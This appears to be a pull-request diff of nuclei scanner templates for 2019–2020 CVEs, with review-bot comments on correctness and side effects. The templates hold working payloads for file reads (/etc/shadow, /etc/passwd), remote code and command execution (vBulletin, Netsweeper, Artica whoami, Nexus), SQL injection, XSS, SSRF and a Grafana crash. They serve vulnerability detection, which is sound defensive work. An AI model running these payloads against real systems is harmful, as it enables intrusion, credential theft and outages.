# References:
# > https://github.com/jas502n/CVE-2019-11580
requests:
- method: GET
path:
- "{{BaseURL}}/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
- "{{BaseURL}}:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
matchers-condition: and
matchers:
- type: word
words:
- "root:*:"
- "bin:*:"
condition: and
part: body
- type: status
status:
- 200
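
Review bot: this does not test the pdkinstall flaw described in the comment. It requests `/crowd/plugins/servlet/exp?cmd=cat /etc/shadow`, i.e. a backdoor servlet named `exp` that a prior run of the referenced PoC leaves behind, so a positive means "already compromised" and a vulnerable but unexploited Crowd is missed. The matcher is also wrong for a successful read: `root:*:` and `bin:*:` only match locked accounts, a usable root line looks like `root:$6$...`. Reading `/etc/shadow` is more intrusive than a check needs; echo a marker instead.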

@ -0,0 +1,20 @@
id: CVE-2019-12314
info:
name: Deltek Maconomy 2.2.5 LFIl
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
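
Review bot: typo in the name, "LFIl" should be "LFI".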

@ -0,0 +1,25 @@
id: CVE-2019-14322
info:
name: Odoo 12.0 - Local File Inclusion
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/base_import/static/c:/windows/win.ini"
- "{{BaseURL}}/web/static/c:/windows/win.ini"
- "{{BaseURL}}/base/static/c:/windows/win.ini"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body

@ -0,0 +1,20 @@
id: CVE-2019-14974
info:
name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
author: madrobot
severity: low
requests:
- method: GET
path:
- "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "url = window.location.search.split(\"?desktop_url=\")[1]"
part: body

@ -0,0 +1,23 @@
id: CVE-2019-15043
info:
author: bing0o
name: Grafana unauthenticated API
severity: medium
requests:
- body: >-
{"dashboard":
{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows":
[{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires":
3600}
headers:
Content-Type: application/json
Host: '{{Hostname}}'
User-Agent: Mozilla/5.0
matchers:
- part: body
type: word
words:
- deleteKey
method: POST
path:
- '{{BaseURL}}/api/snapshots'
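
Review bot: this request creates a snapshot on the target (the `deleteKey` in the response exists to remove it), so the check is state-changing; `expires: 3600` bounds its lifetime but it still writes data into the instance. Add a comment noting the side effect, and consider using the returned `deleteKey` to clean up. The request keys are ordered body, headers, matchers, method, path, which is valid YAML but hard to read; put `method` and `path` first like the other templates.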

@ -0,0 +1,25 @@
id: CVE-2019-16759-1
info:
name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass
author: madrobot
severity: high
# Source:- https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
requests:
- raw:
- |
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
Content-Type: application/x-www-form-urlencoded
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "PHP Version"
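
Review bot: the raw request has no `Host:` header, unlike the other raw templates in this PR (`Host: {{Hostname}}`); add it unless nuclei is confirmed to fill it in. The payload runs `phpinfo()`, which dumps the whole PHP configuration; like the sibling CVE-2019-16759 template, echoing a fixed marker is a lighter proof and gives a tighter matcher than "PHP Version".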

@ -0,0 +1,25 @@
id: CVE-2019-16759
info:
name: 0day RCE in vBulletin v5.0.0-v5.5.4
author: dwisiswant0
severity: high
requests:
- raw:
- |
POST /index.php?routestring=ajax/render/widget_php HTTP/1.1
widgetConfig[code]=echo%20%27bm9uZXhpc3RlbnQ6MTMzNwo=%27%20|%20base64%20-d;%20exit;
- |
POST / HTTP/1.1
{"routestring":"ajax\/render\/widget_php","widgetConfig[code]":"echo 'bm9uZXhpc3RlbnQ6MTMzNwo=' | base64 -d; exit;"}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "nonexistent:1337"
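
Review bot: `widgetConfig[code]` is evaluated as PHP by widget_php, and `echo '...' | base64 -d; exit;` is not PHP: `|` is bitwise OR and `base64 -d` is arithmetic on two undefined constants, so a vulnerable host prints `0` and never "nonexistent:1337". Either wrap the pipeline in `shell_exec('echo bm9uZXhpc3RlbnQ6MTMzNwo= | base64 -d')` or stay in PHP with `echo base64_decode('bm9uZXhpc3RlbnQ6MTMzNwo=');`. The second raw request sends a JSON body to `/` without a Content-Type; confirm vBulletin parses that at all, otherwise it is dead weight.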

@ -0,0 +1,21 @@
id: CVE-2019-17382
info:
name: Zabbix Authentication Bypass
author: Harsh Bothra
severity: Critical
# source:- https://nvd.nist.gov/vuln/detail/CVE-2019-17382
requests:
- method: GET
path:
- '{{BaseURL}}/zabbix.php?action=dashboard.view&dashboardid=1'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>Dashboard</title>"
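
Review bot: `severity: Critical` should be lowercase like the other templates. `<title>Dashboard</title>` plus a 200 is a thin proof that the login was bypassed; a word that only appears on the authenticated dashboard (a widget or menu entry) would make the match more robust.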

@ -0,0 +1,17 @@
id: CVE-2019-18394
info:
name: Openfire Full Read SSRF
author: pdteam - nuclei.projectdiscovery.io
severity: critical
# Source:- https://swarm.ptsecurity.com/openfire-admin-console/
requests:
- method: GET
path:
- "{{BaseURL}}/getFavicon?host=burpcollaborator.net"
matchers:
- type: word
words:
- <h1>Burp Collaborator Server</h1>
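
Review bot: the check relies on the public `burpcollaborator.net` host answering with `<h1>Burp Collaborator Server</h1>`, so it breaks whenever PortSwigger changes that page, and every scan makes the target contact a third party. Use a host the scanner operator controls and document that it must be reachable from the target; otherwise a failed outbound connection is indistinguishable from "not vulnerable".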

@ -0,0 +1,20 @@
id: CVE-2019-19368
info:
name: Rumpus FTP Web File Manager 8.2.9.1 XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "value=''><sVg/OnLoAD=alert`1337`//'>"
part: body

@ -0,0 +1,15 @@
id: CVE-2019-19781
info:
name: Citrix ADC Directory Traversal
author: organiccrap
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/vpn/../vpns/cfg/smb.conf"
matchers:
- type: word
words:
- "[global]"

@ -0,0 +1,20 @@
id: CVE-2019-19908
info:
name: phpMyChat-Plus XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>alert(1337)</script>"
part: body

@ -0,0 +1,33 @@
id: CVE-2019-19985
info:
name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
author: KBA@SOGETI_ESEC, madrobot & dwisiswant0
severity: medium
# Source:- https://www.exploit-db.com/exploits/48698
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all"
matchers-condition: and
matchers:
- type: word
words:
- Name
- Email
- Status
- Created On
condition: and
part: body
- type: word
words:
- "Content-Disposition: attachment; filename=all-contacts.csv;"
part: header
- type: status
status:
- 200
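
Review bot: a positive result downloads the full subscriber list (names and e-mail addresses) from the target. The `Content-Disposition: attachment; filename=all-contacts.csv;` header together with the 200 already proves the unauthenticated export, so consider matching on the header alone, or on the CSV header row `Name,Email,Status,Created On` rather than four separate words; note the PII side effect in a comment either way.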

@ -0,0 +1,20 @@
id: CVE-2019-2588
info:
name: Oracle Business Intelligence Path Traversal
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"
- "{{BaseURL}}:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"
matchers-condition: and
matchers:
- type: word
words:
- 'for 16-bit app support'
- type: status
status:
- 200

@ -0,0 +1,41 @@
id: CVE-2019-2725
info:
name: Oracle WebLogic Server - Unauthenticated RCE
author: dwisiswant0
severity: critical
# Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services).
# Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0.
# Easily exploitable vulnerability allows unauthenticated attacker
# with network access via HTTP to compromise Oracle WebLogic Server.
# Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
# --
# References:
# > https://paper.seebug.org/910/
requests:
- method: POST
path:
- "{{BaseURL}}/_async/AsyncResponseService"
- "{{BaseURL}}:7001/_async/AsyncResponseService"
body: >-
<?xml version="1.0" encoding="UTF-8" ?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:ads="http://www.w3.org/2005/08/addressing">
<soapenv:Header></soapenv:Header>
<soapenv:Body></soapenv:Body>
</soapenv:Envelope>
matchers-condition: and
matchers:
- type: word
words:
- "soapenv:Envelope"
part: body
- type: word
words:
- "X-Powered-By: Servlet"
part: header
- type: status
status:
- 200
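Review bot: the matchers (`soapenv:Envelope` in the body, `X-Powered-By: Servlet` in the header, status 200) only confirm that `/_async/AsyncResponseService` answers an empty SOAP envelope, i.e. that the async component is exposed; they do not show that the deserialization flaw is unpatched. Add the "This template supports the detection part only" comment used elsewhere in this PR and move the version notes from the comment block into `description:`. `"{{BaseURL}}:7001/_async/AsyncResponseService"` appends a port and becomes an invalid URL whenever the input already has one.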

View File

@ -0,0 +1,30 @@
id: CVE-2019-3396
info:
author: "Harsh Bothra"
name: "Atlassian Confluence Path Traversal"
severity: High
# https://github.com/x-f1v3/CVE-2019-3396
requests:
- raw:
- |
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Referer: {{Hostname}}
Content-Length: 168
Connection: close
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<param-name>contextConfigLocation</param-name>"
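Review bot: `severity: High` is capitalised while the rest of the repository uses lowercase (`high`); keep it lowercase so severity filtering stays consistent. The `# https://github.com/x-f1v3/CVE-2019-3396` link belongs in `info` as a reference, and `description:` is missing. `Content-Length: 168` matches the JSON body shown, good.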

View File

@ -0,0 +1,19 @@
id: CVE-2019-3799
info:
name: Spring-Cloud-Config-Server Directory Traversal
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- 'root:[x*]:0:0:'
part: body
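Review bot: `info` has neither `description:` nor a reference for this template, unlike most others in this PR; add both. The path hardcodes the `test/pathtraversal/master` segments; a comment explaining why these fixed values work on any instance would help, otherwise a reader may assume they must be changed per target.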

View File

@ -0,0 +1,23 @@
id: CVE-2019-5418
info:
name: File Content Disclosure on Rails
author: omarkurt
severity: medium
# reference: https://github.com/omarkurt/CVE-2019-5418
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
Accept: ../../../../../../../../etc/passwd{{
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
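Review bot: the `Accept: ../../../../../../../../etc/passwd{{` header ends in an unclosed `{{`, which is also the delimiter nuclei uses for `{{BaseURL}}`-style expressions; confirm the engine passes it through verbatim rather than treating it as a broken placeholder, and add a comment saying the trailing `{{` is part of the payload. Only `{{BaseURL}}` is requested, so a vulnerable action under another route is missed; note that limitation in the comments.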

View File

@ -0,0 +1,30 @@
id: CVE-2019-6112
info:
name: WordPress Plugin Sell Media v2.4.1 - Cross-Site Scripting
author: dwisiswant0
severity: medium
# A Cross-site scripting (XSS) vulnerability
# in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress
# allows remote attackers to inject arbitrary web script or HTML
# via the keyword parameter (aka $search_term or the Search field).
# --
# References:
# > https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
requests:
- method: GET
path:
- "{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "id=\"sell-media-search-text\" class=\"sell-media-search-text\""
- "alert(1337)"
condition: and
part: body
- type: status
status:
- 200
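Review bot: the body matcher requires `alert(1337)` without the surrounding `<script>` tags, so an HTML-escaped reflection (`&lt;script&gt;alert(1337)&lt;/script&gt;`) on a fixed version still matches and reports XSS; match the unescaped `<script>alert(1337)</script>` instead. The comment block already reads like a `description:`, so move it into `info` as this PR intends.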

View File

@ -0,0 +1,39 @@
id: CVE-2019-7609
info:
name: Kibana Timelion Arbitrary Code Execution
author: dwisiswant0
severity: critical
# Kibana versions before 5.6.15 and 6.6.1
# contain an arbitrary code execution flaw in the Timelion visualizer.
# An attacker with access to the Timelion application could send a request
# that will attempt to execute javascript code.
# This could possibly lead to an attacker executing arbitrary commands
# with permissions of the Kibana process on the host system.
# --
# References:
# - https://github.com/mpgn/CVE-2019-7609
requests:
- method: POST
path:
- "{{BaseURL}}/api/timelion/run"
- "{{BaseURL}}:5601/api/timelion/run"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
Content-Type: "application/json; charset=utf-8"
body: "{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}"
matchers-condition: and
matchers:
- type: word
words:
- "seriesList"
part: body
- type: word
words:
- "Content-Type: application/json"
part: header
- type: status
status:
- 200
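Review bot: the request body runs the harmless Timelion expression `.es(*)` and the matchers (`seriesList`, `Content-Type: application/json`, 200) fire on any reachable Timelion API, patched or not, so this is a presence check rather than a vulnerability check; say so in the comment block. `"{{BaseURL}}:5601/api/timelion/run"` appends a port and produces an invalid URL when the input already carries one. The version text in the comments should become `description:`.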

View File

@ -0,0 +1,22 @@
id: CVE-2019-8449
info:
name: JIRA Unauthenticated Sensitive Information Disclosure
author: Harsh Bothra
severity: medium
# source:- https://www.doyler.net/security-not-included/more-jira-enumeration
requests:
- method: GET
path:
- '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '{"users":{"users":'
part: body
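Review bot: `maxResults=50000` asks the target to serialise up to fifty thousand user records when the matcher only needs the `{"users":{"users":` prefix; a small value such as `maxResults=1` gives the same signal with far less load on the target. Move the `# source:-` URL into `info` and add `description:`.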

View File

@ -0,0 +1,31 @@
id: CVE-2019-8451
info:
name: JIRA SSRF in the /plugins/servlet/gadgets/makeRequest resource
author: "TechbrunchFR"
severity: medium
# On September 9, Atlassian released version 8.4.0 for Jira Core and Jira Software, which included a fix for an important
# security issue reported in August 2019.
# CVE-2019-8451 is a pre-authentication server-side request forgery (SSRF) vulnerability found in
# the /plugins/servlet/gadgets/makeRequest resource. The vulnerability exists due to “a logic bug” in the JiraWhitelist class.
# An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable
# Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal
# network resources.
# https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
# https://twitter.com/benmontour/status/1177250393220239360
# https://twitter.com/ojensen5115/status/1176569607357730817
requests:
- method: GET
path:
- '{{BaseURL}}/plugins/servlet/gadgets/makeRequest?url=https://{{Hostname}}:1337@example.com'
headers:
X-Atlassian-token: no-check
matchers:
- type: word
name: ssrf-response-body
words:
- '<p>This domain is for use in illustrative examples in documents.'
part: body
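Review bot: the matcher depends on the target fetching `example.com` over the internet and echoing `<p>This domain is for use in illustrative examples in documents.`; on hosts without outbound access this is a false negative even when the SSRF exists, so document that egress is required. The `X-Atlassian-token: no-check` header and the `https://{{Hostname}}:1337@example.com` URL form deserve a comment explaining why the whitelist accepts them, and the long explanation in comments should be the `description:`.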

View File

@ -0,0 +1,20 @@
id: CVE-2019-8903
info:
name: Totaljs - Unathenticated Directory Traversal
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "apache2.conf"
part: body
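Review bot: `name:` misspells `Unathenticated`; correct it to `Unauthenticated`. The body matcher `apache2.conf` relies on the Debian default Apache index page being served from `/var/www/html/index.html`; a customised index page makes the traversal succeed but the match fail, so consider a second target file with stable content (`/etc/passwd` with the `root:[x*]:0:0:` regex used elsewhere in this PR). `info` lacks `description:`.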

View File

@ -0,0 +1,19 @@
id: CVE-2019-8982
info:
name: Wavemaker Studio 6.6 LFI/SSRF
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
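Review bot: `inUrl=file///etc/passwd` omits the colon of a `file:///` URI; if that spelling is deliberate, say so in a comment, otherwise the next editor will "fix" it and break the check. `info` has no `description:` or reference.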

View File

@ -0,0 +1,22 @@
id: CVE-2019-9978
info:
name: WordPress social-warfare RFI
author: madrobot & dwisiswant0
severity: critical
# Reference:- https://github.com/mpgn/CVE-2019-9978
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://burpcollaborator.net"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Burp Collabolator Server"
part: body
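Review bot: the matcher word `Burp Collabolator Server` misspells "Collaborator", so it never matches the Collaborator landing page and the template always reports negative; fix the spelling. The payload also makes every scanned host fetch the public `burpcollaborator.net` domain, which is worth a comment so operators know about the outbound request. The `# Reference:-` URL should move into `info` together with a `description:`.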

View File

@ -0,0 +1,26 @@
id: CVE-2020-10199
info:
name: Nexus Repository Manager 3 RCE
auhtor: hetroublemakr
severity: high
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
requests:
- method: POST
path:
- '{{BaseURL}}/rest/beta/repositories/go/group'
headers:
Content-Type: application/json
body: '{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ 1337 * 1337 }"]}}'
matchers-condition: and
matchers:
- type: word
words:
- "1787569"
part: body
- type: status
status:
- 400
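Review bot: the key is `auhtor:` instead of `author:`, so `info.author` is empty for this template; fix the spelling. `"1787569"` is `1337 * 1337` from the `$\\c{ 1337 * 1337 }` expression and the 400 status is expected for the rejected repository name, fine. Add `description:` and move the Sonatype URL into `info`.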

View File

@ -0,0 +1,24 @@
id: CVE-2020-10204
info:
name: Sonatype Nexus Repository RCE
auhtor: hetroublemakr
severity: high
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
requests:
- method: POST
path:
- '{{BaseURL}}/extdirect'
body: '{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}'
matchers-condition: and
matchers:
- type: word
words:
- "1787569"
part: body
- type: status
status:
- 200
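Review bot: the key is `auhtor:` rather than `author:`, so no author is recorded; fix the spelling. In the body the expression `"$\\c{1337*1337"` lacks the closing `}`; confirm it still evaluates, otherwise the `"1787569"` matcher can never fire. The reference URL is the CVE-2020-10199 article; link the CVE-2020-10204 advisory here, and add `description:`.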

View File

@ -0,0 +1,35 @@
id: CVE-2020-1147
info:
name: RCE at SharePoint Server (.NET Framework & Visual Studio) detection
author: dwisiswant0
severity: critical
# Ref:
# - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147
# - https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html
requests:
- method: GET
path:
- "{{BaseURL}}/_layouts/15/listform.aspx?PageType=1&ListId=%7B13371337-1337-1337-1337-133713371337%7D"
matchers-condition: and
matchers:
- type: word
words:
- "List does not exist"
- "It may have been deleted by another user"
part: body
condition: and
- type: word
words:
- "Microsoft-IIS"
- "X-SharePointHealthScore"
- "SharePointError"
- "SPRequestGuid"
- "MicrosoftSharePointTeamServices"
condition: or
part: header
- type: status
status:
- 200
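Review bot: the matchers fingerprint SharePoint (the `List does not exist` page for a bogus `ListId` plus `Microsoft-IIS` / `X-SharePointHealthScore` headers); they say nothing about whether the DataSet deserialization fix is installed, so every SharePoint server matches. State in the comments that this is a product fingerprint only, or pair `severity: critical` with a patch-level signal. The two MSRC/srcincite links should become `info` references with a `description:`.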

View File

@ -0,0 +1,29 @@
id: CVE-2020-12720
info:
name: CVE-2020-12720 vBulletin SQLI
author: pdnuclei - projectdiscovery.io
severity: critical
# Source https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
# This template supports the detection part only.
# Do not test any website without permission
# https://github.com/swisskyrepo/nuclei-templates/blob/20179794c2030144ec85f0231a8d455b5d7e35c5/cves/CVE-2020-12720.yaml
requests:
- raw:
- |
POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1
Host: {{Hostname}}
Accept: */*
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Content-Length: 218
Content-Type: application/x-www-form-urlencoded
nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-
matchers:
- type: word
words:
- "vbulletinrce"
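Review bot: `Content-Length: 218` does not match the body as shown here, which is 220 bytes; if the header is sent as written the trailing `+-` of the `--+-` comment terminator is cut off. Drop the explicit header or correct it. The single `vbulletinrce` matcher has no status check; adding `status: 200` reduces noise from error pages that echo the input.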

View File

@ -0,0 +1,41 @@
id: CVE-2020-13167
info:
name: Netsweeper WebAdmin unixlogin.php Python Code Injection
author: dwisiswant0
severity: critical
# This template exploits a Python code injection in the Netsweeper
# WebAdmin component's unixlogin.php script, for versions 6.4.4 and
# prior, to execute code as the root user.
# Authentication is bypassed by sending a random whitelisted Referer
# header in each request.
# Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
# Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
# been confirmed exploitable.
# References:
# - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
# - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
requests:
- method: GET
path:
# Payload on hex: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
- "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
- "{{BaseURL}}/webadmin/out"
headers:
Referer: "http://{{Hostname}}/webadmin/admin/service_manager_data.php"
User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)"
Connection: "close"
matchers-condition: and
matchers:
- type: word
words:
- "nonexistent"
part: body
- type: status
status:
- 200
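Review bot: the first path writes `/usr/local/netsweeper/webadmin/out` on the target (the comment shows the hex decoding to a `base64 -d > /usr/local/netsweeper/webadmin/out` redirect) and nothing removes it, so a positive result leaves a file under the web root. Document the artifact and its cleanup in the comments, or use a check that does not persist anything. The comment block is a ready-made `description:`.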

View File

@ -0,0 +1,21 @@
id: CVE-2020-13379
info:
name: Unauthenticated Grafana DoS
author: pxmme1337
severity: medium
# Source:- https://www.exploit-db.com/exploits/48638
# WARNING
# This vulnerability results in complete crashing of the grafana-server application.
requests:
- method: GET
path:
- '{{BaseURL}}avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D'
- '{{BaseURL}}/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D'
- "{{BaseURL}}/"
matchers:
- type: status
status:
- 502
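Review bot: the lone `status: 502` matcher applies to each of the three requests independently, so a reverse proxy answering 502 for an unrelated reason (or for the payload request itself) is reported as a successful crash; check that `{{BaseURL}}/` returns 200 before the payload and require the 502 only afterwards to make the result meaningful. The first path `'{{BaseURL}}avatar/...'` has no `/` after `{{BaseURL}}`; if it is there for inputs with a trailing slash, say so, otherwise remove it. The `WARNING` comment is the right place for a `description:` too.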

View File

@ -0,0 +1,45 @@
id: CVE-2020-17505
info:
name: Artica Web Proxy 4.30 OS Command Injection
author: dwisiswant0
severity: high
# Artica Web Proxy 4.30.00000000
# allows an authenticated remote attacker
# to inject commands via the service-cmds parameter in cyrus.php.
# These commands are executed with root
# privileges via service_cmds_peform.
# -
# References:
# > https://blog.max0x4141.com/post/artica_proxy/
requests:
- raw:
- |
GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
- |
GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- "array(2)"
- "Position: ||whoami||"
- "root"
condition: and
part: body
- type: status
status:
- 200
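Review bot: the comments describe the flaw well but `info` still has no `description:`; move them there as the PR title intends. The comment names the parameter `service-cmds` and the function `service_cmds_peform`, while the request uses `service-cmds-peform`; check the names agree. The second request executes `whoami` on the target with the session obtained by the first one (`cookie-reuse: true`), which the comments should state so operators know the check runs a command, not just a read.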

View File

@ -0,0 +1,41 @@
id: CVE-2020-17506
info:
name: Artica Web Proxy 4.30 Authentication Bypass
author: dwisiswant0
severity: critical
# Artica Web Proxy 4.30.00000000
# allows remote attacker to bypass privilege detection
# and gain web backend administrator privileges
# through SQL injection of the apikey parameter in fw.login.php.
# -
# References:
# > https://blog.max0x4141.com/post/artica_proxy/
requests:
- method: GET
path:
- "{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
redirects: true
max-redirects: 1
matchers-condition: and
matchers:
- type: word
words:
- "artica-applianc"
- type: status
status:
- 200
- 301
- 302
condition: or
- type: word
name: session
words:
- "PHPSESSID"
part: header
extractors:
- type: kval
kval:
- "PHPSESSID"
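Review bot: the `kval` extractor on `PHPSESSID` writes a live administrator session cookie into the scan output; note in the comments that results must be handled as credentials, or drop the extractor since the `session` matcher already proves the bypass. The word `artica-applianc` looks truncated (`artica-appliance`?); if it is a deliberate prefix match, a comment stops someone "completing" it. The comment block belongs in `description:`.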

View File

@ -0,0 +1,20 @@
id: CVE-2020-2096
info:
name: Jenkins Gitlab Hook XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/gitlab/build_now%3Csvg/onload=alert(1337)%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<svg/onload=alert(1337)>"
part: body
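Review bot: `info` has no `description:` and no reference for this Jenkins Gitlab Hook XSS; add both. Matching the raw `<svg/onload=alert(1337)>` string in the body correctly excludes HTML-escaped reflections, good.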

View File

@ -0,0 +1,24 @@
id: CVE-2020-3187
# Reference: https://twitter.com/aboul3la/status/1286809567989575685
info:
name: CVE-2020-3187
author: KareemSe1im
severity: High
requests:
- method: GET
path:
- "{{BaseURL}}/+CSCOE+/session_password.html"
matchers-condition: and
matchers:
- type: word
words:
- webvpn
- Webvpn
part: header
- type: status
status:
- 200
